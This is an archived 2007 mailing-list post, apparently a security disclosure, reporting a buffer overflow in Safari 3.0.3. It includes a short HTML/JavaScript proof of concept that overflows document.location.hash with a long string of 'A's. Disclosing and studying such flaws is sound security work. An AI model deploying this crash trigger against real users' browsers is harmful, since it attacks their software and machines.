Hosting Provided By

Safari 3.0.3 (522.15.5) Buffer overflow

From: <azizov(at)itdefence.ru>
Date: Fri Sep 07 2007 - 12:28:06 EDT

Azizov E. (azizov@itdefence.ru)

At processing of data, which has more than 65474 bytes in size, occurs buffer overflow.

POC:
<html>
<body>
<script>

var maxbuf = 65474;

buff = "A";
for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! ";
alert(document.location.hash);
</script>
</body>
</html>
Received on Fri Sep 7 12:40:09 2007

This message: [ Message body ]
Next message: Adrian P: "Re: Buffalo AirStation WHR-G54S CSRF vulnerability"
Previous message: Foresight Linux Essential Announcement Service: "FLEA-2007-0052-1 gd"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:14:53 EDT